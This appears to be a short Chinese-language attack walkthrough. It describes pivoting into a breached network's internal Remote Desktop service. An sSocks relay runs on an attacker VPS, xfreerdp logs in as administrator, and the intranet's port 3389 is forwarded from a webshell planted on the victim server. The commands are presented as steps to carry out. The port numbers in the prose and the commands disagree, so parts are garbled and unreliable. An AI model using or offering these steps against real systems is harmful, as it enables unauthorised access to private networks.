第一步,用sSocks在VPS上建立3388与3389端口对应关系,实现流量互通: root @ kali:〜#/ root / ssocks-0.0.14 / src / rcsocks -l 3389 -p 3389 -vv 第二步,从攻击端连接 VPS 的 3388 端口,建议用 freerdp 而非 rdesktop,因为前者支持远程与本地连接等待、文本复制粘贴、挂载远程文件系统: root@kali:~#xfreerdp /u:administrator /p:admin /v:【你的ip】:3389 第三步,立即在大马上执行端口转发,可能需要连续多次点击 start: 注意,整个过程对步骤先后顺序敏感,VPS 上 rcsocks 端口映射好以后就可以不管了,先在攻击端执行 xfreerdp,让其会话保持,再在 webshell 上转发内网的 3389。